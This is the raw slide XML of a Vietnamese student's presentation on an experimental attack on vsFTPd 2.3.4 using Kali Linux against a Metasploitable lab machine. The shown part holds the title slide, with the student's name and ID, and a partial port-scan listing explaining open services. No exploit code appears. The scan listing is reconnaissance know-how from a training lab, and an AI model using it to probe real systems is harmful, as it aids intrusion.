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71" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="270"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45" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="3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050A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2173504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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2053754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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C7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34376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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2789185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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C7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94803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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3727810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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2496917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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3460296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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2598407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50A9F-09C2-4F34-A003-24F2F3572B99}"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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2725135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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3572372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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1122837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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/9/2024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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2727347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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/9/2024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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2206630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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3309542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050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">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F4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2604946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8050A9F-09C2-4F34-A003-24F2F3572B99}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/9/2024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BF4B340-30BD-4386-9F7D-D58252E07C73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3645529835"/>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CCABE-C05B-4AAB-A38A-89B9EC6734B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822251" y="406399"/>
            <a:ext cx="9144000" cy="3428409"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A15CF59-75F9-4827-BE77-3313C2A79814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340242" y="4064001"/>
            <a:ext cx="9144000" cy="1828801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sinh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lâm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thời</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 15/9/2024.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSV: 75DCTT11238</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Khoa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Học</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Giao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tải</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3354991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321890-35FA-4621-BAE7-D84ED17E158C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="184298"/>
            <a:ext cx="10515600" cy="6673702"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2049/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: NFS (Network File System) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> chia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tệp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2121/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Thường dùng cho FTP hoặc các ứng dụng tùy chỉnh khác. Có thể là một cổng FTP hoặc một dịch vụ tùy chỉnh khác.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3306/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>MySQL - Cổng tiêu chuẩn cho dịch vụ cơ sở dữ liệu MySQL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5432/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>PostgreSQL - Cổng tiêu chuẩn cho dịch vụ cơ sở dữ liệu PostgreSQL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5900/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped:VNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Virtual Network Computing) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VNC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  tcpwrapped:X11 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> X Window System (X11), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
